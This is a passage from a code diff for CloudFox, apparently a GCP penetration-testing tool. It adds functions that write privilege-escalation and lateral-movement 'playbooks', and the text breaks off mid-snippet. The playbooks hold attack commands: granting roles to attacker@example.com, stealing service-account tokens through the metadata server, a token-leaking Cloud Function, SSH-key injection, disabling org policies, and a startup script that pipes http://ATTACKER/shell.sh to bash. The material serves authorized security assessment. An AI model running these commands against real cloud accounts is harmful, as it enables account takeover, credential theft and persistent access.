+ sections.WriteString("```bash\n") + sections.WriteString("# Create a custom role with setIamPolicy permission\n") + sections.WriteString("gcloud iam roles create customPrivesc --project=PROJECT_ID \\\n") + sections.WriteString(" --title='Custom Admin' \\\n") + sections.WriteString(" --permissions='resourcemanager.projects.setIamPolicy'\n\n") + sections.WriteString("# Update existing custom role to add dangerous permissions\n") + sections.WriteString("gcloud iam roles update ROLE_ID --project=PROJECT_ID \\\n") + sections.WriteString(" --add-permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") + sections.WriteString("```\n\n") + } + + // Service Account IAM + if len(categories["SA IAM"]) > 0 { + sections.WriteString("## Service Account IAM Modification\n\n") + sections.WriteString("Principals who can modify service account IAM can grant themselves or others the ability to impersonate SAs.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["SA IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s) in %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List service accounts to find targets\n") + sections.WriteString("gcloud iam service-accounts list --project=PROJECT_ID\n\n") + sections.WriteString("# Grant yourself token creator role on a privileged SA\n") + sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") + sections.WriteString(" SA@PROJECT_ID.iam.gserviceaccount.com \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") + sections.WriteString("# Then impersonate the SA\n") + sections.WriteString("gcloud auth print-access-token \\\n") + sections.WriteString(" --impersonate-service-account=SA@PROJECT_ID.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Org Policy + if len(categories["Org Policy"]) > 0 { + sections.WriteString("## Organization Policy Modification\n\n") + sections.WriteString("Principals who can modify org policies can disable security constraints.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Org Policy"] { + sections.WriteString(fmt.Sprintf("- %s (%s) at %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Disable domain restricted sharing constraint\n") + sections.WriteString("gcloud resource-manager org-policies disable-enforce \\\n") + sections.WriteString(" constraints/iam.allowedPolicyMemberDomains \\\n") + sections.WriteString(" --organization=ORG_ID\n\n") + sections.WriteString("# Disable public access prevention\n") + sections.WriteString("gcloud resource-manager org-policies disable-enforce \\\n") + sections.WriteString(" constraints/storage.publicAccessPrevention \\\n") + sections.WriteString(" --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + // Storage IAM + if len(categories["Storage IAM"]) > 0 { + sections.WriteString("## Storage Bucket IAM Modification\n\n") + sections.WriteString("Principals who can modify bucket IAM can grant themselves access to bucket contents.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Storage IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s)\n", admin.Principal, admin.PrincipalType)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant yourself object viewer on a bucket\n") + sections.WriteString("gsutil iam ch user:attacker@example.com:objectViewer gs://BUCKET_NAME\n\n") + sections.WriteString("# Or grant full admin access\n") + sections.WriteString("gsutil iam ch user:attacker@example.com:objectAdmin gs://BUCKET_NAME\n") + sections.WriteString("```\n\n") + } + + // Secrets IAM + if len(categories["Secrets IAM"]) > 0 { + sections.WriteString("## Secret Manager IAM Modification\n\n") + sections.WriteString("Principals who can modify secret IAM can grant themselves access to secret values.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Secrets IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s)\n", admin.Principal, admin.PrincipalType)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant yourself secret accessor role\n") + sections.WriteString("gcloud secrets add-iam-policy-binding SECRET_NAME \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/secretmanager.secretAccessor' \\\n") + sections.WriteString(" --project=PROJECT_ID\n\n") + sections.WriteString("# Then access the secret\n") + sections.WriteString("gcloud secrets versions access latest --secret=SECRET_NAME --project=PROJECT_ID\n") + sections.WriteString("```\n\n") + } + + return sections.String() +} + +func (m *HiddenAdminsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *HiddenAdminsModule) getHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Principal", + "Principal Type", + "Permission", + "Category", + } +} + +func (m *HiddenAdminsModule) adminsToTableBody(admins []HiddenAdmin) [][]string { + var body [][]string + for _, admin := range admins { + scopeName := admin.ScopeName + if scopeName == "" { + scopeName = admin.ScopeID + } + + body = append(body, []string{ + admin.ScopeType, + admin.ScopeID, + scopeName, + admin.Principal, + admin.PrincipalType, + admin.Permission, + admin.Category, + }) + } + return body +} + +func (m *HiddenAdminsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + if admins, ok := m.ProjectAdmins[projectID]; ok && len(admins) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "hidden-admins", + Header: m.getHeader(), + Body: m.adminsToTableBody(admins), + }) + } + return tableFiles +} + +func (m *HiddenAdminsModule) buildAllTables() []internal.TableFile { + if len(m.AllAdmins) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "hidden-admins", + Header: m.getHeader(), + Body: m.adminsToTableBody(m.AllAdmins), + }, + } +} + +func (m *HiddenAdminsModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *HiddenAdminsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } else if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } + + if orgID != "" { + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = HiddenAdminsOutput{Table: tables, Loot: lootFiles} + + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { + outputData.ProjectLevelData[projectID] = HiddenAdminsOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = HiddenAdminsOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +func (m *HiddenAdminsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildAllTables() + lootFiles := m.collectLootFiles() + + output := HiddenAdminsOutput{Table: tables, Loot: lootFiles} + + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } +} + +// Helper functions (shared with attackpathService) +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +func extractPrincipalEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index ffef7d14..f1a36cc4 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -256,6 +256,271 @@ func (m *LateralMovementModule) initializeLootForProject(projectID string) { } } +func (m *LateralMovementModule) generatePlaybook() *internal.LootFile { + return &internal.LootFile{ + Name: "lateral-movement-playbook", + Contents: `# GCP Lateral Movement Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified lateral movement paths. + +` + m.generatePlaybookSections(), + } +} + +func (m *LateralMovementModule) generatePlaybookSections() string { + var sections strings.Builder + + allChains := m.getAllImpersonationChains() + allVectors := m.getAllTokenTheftVectors() + allPermPaths := m.getAllPermissionBasedPaths() + + // Impersonation Chains + if len(allChains) > 0 { + sections.WriteString("## Service Account Impersonation Chains\n\n") + sections.WriteString("These principals can impersonate service accounts to gain their permissions.\n\n") + sections.WriteString("### Identified Chains:\n") + for _, chain := range allChains { + sections.WriteString(fmt.Sprintf("- %s -> %s\n", chain.StartIdentity, chain.TargetSA)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Generate access token for target SA\n") + sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Create persistent key for long-term access\n") + sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Use token with any gcloud command\n") + sections.WriteString("gcloud compute instances list --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Token Theft - Group by resource type + computeVectors := []TokenTheftVector{} + functionVectors := []TokenTheftVector{} + cloudRunVectors := []TokenTheftVector{} + gkeVectors := []TokenTheftVector{} + + for _, v := range allVectors { + switch v.ResourceType { + case "compute_instance": + computeVectors = append(computeVectors, v) + case "cloud_function": + functionVectors = append(functionVectors, v) + case "cloud_run": + cloudRunVectors = append(cloudRunVectors, v) + case "gke_cluster", "gke_nodepool": + gkeVectors = append(gkeVectors, v) + } + } + + // Compute Instance Token Theft + if len(computeVectors) > 0 { + sections.WriteString("## Compute Instance Token Theft\n\n") + sections.WriteString("These compute instances have attached service accounts whose tokens can be stolen via the metadata server.\n\n") + sections.WriteString("### Vulnerable Instances:\n") + for _, v := range computeVectors { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# SSH into the instance\n") + sections.WriteString("gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=PROJECT_ID\n\n") + sections.WriteString("# Steal SA token from metadata server\n") + sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# Get SA email\n") + sections.WriteString("curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'\n\n") + sections.WriteString("# Use token with curl\n") + sections.WriteString("TOKEN=$(curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)\n") + sections.WriteString("curl -H \"Authorization: Bearer $TOKEN\" \\\n") + sections.WriteString(" 'https://www.googleapis.com/compute/v1/projects/PROJECT/zones/ZONE/instances'\n") + sections.WriteString("```\n\n") + } + + // Cloud Functions Token Theft + if len(functionVectors) > 0 { + sections.WriteString("## Cloud Functions Token Theft\n\n") + sections.WriteString("These Cloud Functions have attached service accounts. Deploy a malicious function to steal tokens.\n\n") + sections.WriteString("### Vulnerable Functions:\n") + for _, v := range functionVectors { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create token stealer function\n") + sections.WriteString("mkdir /tmp/fn-stealer && cd /tmp/fn-stealer\n\n") + sections.WriteString("cat > main.py << 'EOF'\n") + sections.WriteString("import functions_framework\n") + sections.WriteString("import requests\n\n") + sections.WriteString("@functions_framework.http\n") + sections.WriteString("def steal(request):\n") + sections.WriteString(" r = requests.get(\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token',\n") + sections.WriteString(" headers={'Metadata-Flavor': 'Google'})\n") + sections.WriteString(" return r.json()\n") + sections.WriteString("EOF\n\n") + sections.WriteString("echo 'functions-framework\\nrequests' > requirements.txt\n\n") + sections.WriteString("# Deploy with target SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud functions deploy stealer --gen2 --runtime=python311 \\\n") + sections.WriteString(" --trigger-http --allow-unauthenticated \\\n") + sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Invoke to get token\n") + sections.WriteString("curl $(gcloud functions describe stealer --format='value(url)')\n") + sections.WriteString("```\n\n") + } + + // Cloud Run Token Theft + if len(cloudRunVectors) > 0 { + sections.WriteString("## Cloud Run Token Theft\n\n") + sections.WriteString("These Cloud Run services have attached service accounts.\n\n") + sections.WriteString("### Vulnerable Services:\n") + for _, v := range cloudRunVectors { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Deploy Cloud Run service with target SA\n") + sections.WriteString("# (requires run.services.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud run deploy stealer --image=gcr.io/PROJECT/stealer \\\n") + sections.WriteString(" --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --allow-unauthenticated\n\n") + sections.WriteString("# Container code fetches token from metadata server same as compute\n") + sections.WriteString("```\n\n") + } + + // GKE Token Theft + if len(gkeVectors) > 0 { + sections.WriteString("## GKE Cluster Token Theft\n\n") + sections.WriteString("These GKE clusters have node service accounts that can be accessed from pods.\n\n") + sections.WriteString("### Vulnerable Clusters:\n") + for _, v := range gkeVectors { + sections.WriteString(fmt.Sprintf("- %s (SA: %s) in %s\n", v.ResourceName, v.ServiceAccount, v.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Get cluster credentials\n") + sections.WriteString("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=PROJECT\n\n") + sections.WriteString("# If Workload Identity is NOT enabled, steal node SA token from any pod:\n") + sections.WriteString("kubectl exec -it POD -- curl -s -H 'Metadata-Flavor: Google' \\\n") + sections.WriteString(" 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# If Workload Identity IS enabled, check for pod SA token:\n") + sections.WriteString("kubectl exec -it POD -- cat /var/run/secrets/kubernetes.io/serviceaccount/token\n\n") + sections.WriteString("# List secrets for credentials\n") + sections.WriteString("kubectl get secrets -A -o yaml\n") + sections.WriteString("```\n\n") + } + + // Permission-Based Paths - Group by category + networkPaths := []PermissionBasedLateralPath{} + computeAccessPaths := []PermissionBasedLateralPath{} + dbAccessPaths := []PermissionBasedLateralPath{} + iapPaths := []PermissionBasedLateralPath{} + + for _, p := range allPermPaths { + switch { + case strings.Contains(p.Category, "Network") || strings.Contains(p.Category, "VPC"): + networkPaths = append(networkPaths, p) + case strings.Contains(p.Category, "Compute Access") || strings.Contains(p.Category, "osLogin"): + computeAccessPaths = append(computeAccessPaths, p) + case strings.Contains(p.Category, "Database"): + dbAccessPaths = append(dbAccessPaths, p) + case strings.Contains(p.Category, "IAP"): + iapPaths = append(iapPaths, p) + } + } + + // Network-based Lateral Movement + if len(networkPaths) > 0 { + sections.WriteString("## Network-Based Lateral Movement\n\n") + sections.WriteString("These principals have permissions to modify network configurations for lateral movement.\n\n") + sections.WriteString("### Principals:\n") + for _, p := range networkPaths { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create VPC peering to another project\n") + sections.WriteString("gcloud compute networks peerings create pivot \\\n") + sections.WriteString(" --network=SOURCE_NETWORK \\\n") + sections.WriteString(" --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK\n\n") + sections.WriteString("# Create firewall rule to allow access\n") + sections.WriteString("gcloud compute firewall-rules create allow-pivot \\\n") + sections.WriteString(" --network=NETWORK --allow=tcp:22,tcp:3389 \\\n") + sections.WriteString(" --source-ranges=ATTACKER_IP/32\n\n") + sections.WriteString("# Create VPN tunnel to external network\n") + sections.WriteString("gcloud compute vpn-tunnels create exfil-tunnel \\\n") + sections.WriteString(" --peer-address=EXTERNAL_IP --shared-secret=SECRET \\\n") + sections.WriteString(" --ike-version=2 --target-vpn-gateway=GATEWAY\n") + sections.WriteString("```\n\n") + } + + // Compute Access Paths + if len(computeAccessPaths) > 0 { + sections.WriteString("## Compute Instance Access\n\n") + sections.WriteString("These principals can access compute instances via OS Login or metadata modification.\n\n") + sections.WriteString("### Principals:\n") + for _, p := range computeAccessPaths { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# SSH via OS Login (compute.instances.osLogin)\n") + sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n\n") + sections.WriteString("# SSH via OS Login with sudo (compute.instances.osAdminLogin)\n") + sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --project=PROJECT\n") + sections.WriteString("# Then run: sudo su\n\n") + sections.WriteString("# Inject SSH key via instance metadata\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") + sections.WriteString("# Inject SSH key project-wide\n") + sections.WriteString("gcloud compute project-info add-metadata \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") + sections.WriteString("```\n\n") + } + + // Database Access Paths + if len(dbAccessPaths) > 0 { + sections.WriteString("## Database Access\n\n") + sections.WriteString("These principals can connect to database instances.\n\n") + sections.WriteString("### Principals:\n") + for _, p := range dbAccessPaths { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Connect to Cloud SQL instance\n") + sections.WriteString("gcloud sql connect INSTANCE_NAME --user=USER --project=PROJECT\n\n") + sections.WriteString("# Create database user for persistence\n") + sections.WriteString("gcloud sql users create attacker \\\n") + sections.WriteString(" --instance=INSTANCE_NAME --password=PASSWORD\n") + sections.WriteString("```\n\n") + } + + // IAP Access Paths + if len(iapPaths) > 0 { + sections.WriteString("## IAP Tunnel Access\n\n") + sections.WriteString("These principals can access resources via Identity-Aware Proxy tunnels.\n\n") + sections.WriteString("### Principals:\n") + for _, p := range iapPaths { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Start IAP tunnel to instance\n") + sections.WriteString("gcloud compute start-iap-tunnel INSTANCE 22 --zone=ZONE\n\n") + sections.WriteString("# SSH through IAP tunnel\n") + sections.WriteString("gcloud compute ssh INSTANCE --zone=ZONE --tunnel-through-iap\n\n") + sections.WriteString("# Forward port through IAP\n") + sections.WriteString("gcloud compute start-iap-tunnel INSTANCE 3306 --zone=ZONE --local-host-port=localhost:3306\n") + sections.WriteString("```\n\n") + } + + return sections.String() +} + func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) @@ -962,6 +1227,9 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log projectIDs[projectID] = true } + // Generate playbook once for all projects + playbook := m.generatePlaybook() + for projectID := range projectIDs { tableFiles := m.buildTablesForProject(projectID) @@ -974,6 +1242,11 @@ func (m *LateralMovementModule) writeHierarchicalOutput(ctx context.Context, log } } + // Add playbook to first project only (to avoid duplication) + if playbook != nil && playbook.Contents != "" && len(outputData.ProjectLevelData) == 0 { + lootFiles = append(lootFiles, *playbook) + } + outputData.ProjectLevelData[projectID] = LateralMovementOutput{Table: tableFiles, Loot: lootFiles} } @@ -1018,6 +1291,12 @@ func (m *LateralMovementModule) writeFlatOutput(ctx context.Context, logger inte } } + // Add playbook + playbook := m.generatePlaybook() + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) + } + output := LateralMovementOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 6d4edacb..857c49d0 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -177,6 +177,306 @@ func (m *PrivescModule) generateLoot() { for _, path := range m.AllPaths { m.addPathToLoot(path) } + + // Generate playbook + m.generatePlaybook() +} + +func (m *PrivescModule) generatePlaybook() { + m.LootMap["privesc-playbook"] = &internal.LootFile{ + Name: "privesc-playbook", + Contents: `# GCP Privilege Escalation Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified privilege escalation paths. + +` + m.generatePlaybookSections(), + } +} + +func (m *PrivescModule) generatePlaybookSections() string { + var sections strings.Builder + + // Group paths by category + categories := map[string][]attackpathservice.AttackPath{ + "SA Impersonation": {}, + "Key Creation": {}, + "IAM Modification": {}, + "Compute": {}, + "Serverless": {}, + "Data Processing": {}, + "Orchestration": {}, + "CI/CD": {}, + "GKE": {}, + "Secrets": {}, + "Deployment": {}, + "Federation": {}, + "Org Policy": {}, + "SA Usage": {}, + } + + for _, path := range m.AllPaths { + if _, ok := categories[path.Category]; ok { + categories[path.Category] = append(categories[path.Category], path) + } + } + + // Service Account Impersonation + if len(categories["SA Impersonation"]) > 0 { + sections.WriteString("## Service Account Impersonation\n\n") + sections.WriteString("Principals with SA impersonation capabilities can generate tokens and act as service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["SA Impersonation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Generate access token for a service account (iam.serviceAccounts.getAccessToken)\n") + sections.WriteString("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Sign a blob as the SA (iam.serviceAccounts.signBlob)\n") + sections.WriteString("echo 'data' | gcloud iam service-accounts sign-blob - signed.txt \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Sign a JWT as the SA (iam.serviceAccounts.signJwt)\n") + sections.WriteString("gcloud iam service-accounts sign-jwt input.json output.jwt \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Generate OIDC token (iam.serviceAccounts.getOpenIdToken)\n") + sections.WriteString("gcloud auth print-identity-token --impersonate-service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // Key Creation + if len(categories["Key Creation"]) > 0 { + sections.WriteString("## Persistent Key Creation\n\n") + sections.WriteString("Principals with key creation capabilities can create long-lived credentials.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Key Creation"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create persistent SA key (iam.serviceAccountKeys.create)\n") + sections.WriteString("gcloud iam service-accounts keys create key.json \\\n") + sections.WriteString(" --iam-account=TARGET_SA@PROJECT.iam.gserviceaccount.com\n\n") + sections.WriteString("# Use the key\n") + sections.WriteString("gcloud auth activate-service-account --key-file=key.json\n\n") + sections.WriteString("# Create HMAC key for S3-compatible access (storage.hmacKeys.create)\n") + sections.WriteString("gcloud storage hmac create TARGET_SA@PROJECT.iam.gserviceaccount.com\n") + sections.WriteString("```\n\n") + } + + // IAM Modification + if len(categories["IAM Modification"]) > 0 { + sections.WriteString("## IAM Policy Modification\n\n") + sections.WriteString("Principals with IAM modification capabilities can grant themselves elevated access.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["IAM Modification"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s at %s\n", path.Principal, path.PrincipalType, path.Method, path.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant Owner role at project level\n") + sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n\n") + sections.WriteString("# Grant SA impersonation on a privileged SA\n") + sections.WriteString("gcloud iam service-accounts add-iam-policy-binding \\\n") + sections.WriteString(" TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/iam.serviceAccountTokenCreator'\n\n") + sections.WriteString("# Create custom role with escalation permissions\n") + sections.WriteString("gcloud iam roles create privesc --project=PROJECT_ID \\\n") + sections.WriteString(" --permissions='iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create'\n") + sections.WriteString("```\n\n") + } + + // Compute + if len(categories["Compute"]) > 0 { + sections.WriteString("## Compute Instance Exploitation\n\n") + sections.WriteString("Principals with compute permissions can create instances or modify metadata to escalate privileges.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Compute"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create instance with privileged SA (compute.instances.create + iam.serviceAccounts.actAs)\n") + sections.WriteString("gcloud compute instances create pwned \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --service-account=PRIVILEGED_SA@PROJECT.iam.gserviceaccount.com \\\n") + sections.WriteString(" --scopes=cloud-platform\n\n") + sections.WriteString("# SSH and steal token\n") + sections.WriteString("gcloud compute ssh pwned --zone=us-central1-a \\\n") + sections.WriteString(" --command='curl -s -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n\n") + sections.WriteString("# Inject startup script for reverse shell (compute.instances.setMetadata)\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=startup-script='#!/bin/bash\n") + sections.WriteString("curl http://ATTACKER/shell.sh | bash'\n\n") + sections.WriteString("# Add SSH key via metadata\n") + sections.WriteString("gcloud compute instances add-metadata INSTANCE --zone=ZONE \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n\n") + sections.WriteString("# Project-wide SSH key injection (compute.projects.setCommonInstanceMetadata)\n") + sections.WriteString("gcloud compute project-info add-metadata \\\n") + sections.WriteString(" --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\"\n") + sections.WriteString("```\n\n") + } + + // Serverless + if len(categories["Serverless"]) > 0 { + sections.WriteString("## Serverless Function/Service Exploitation\n\n") + sections.WriteString("Principals with serverless permissions can deploy code that runs as privileged service accounts.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, path := range categories["Serverless"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", path.Principal, path.PrincipalType, path.Method)) + } + sections.WriteString("\n### Exploitation - Cloud Functions:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create function that steals SA token\n") + sections.WriteString("mkdir /tmp/pwn && cd /tmp/pwn\n") + sections.WriteString("cat > main.py << 'EOF'\n") + sections.WriteString("import functions_framework\n") + sections.WriteString("import requests\n\n") + sections.WriteString("@functions_framework.http\n") + sections.WriteString("def pwn(request):\n") + sections.WriteString(" r = 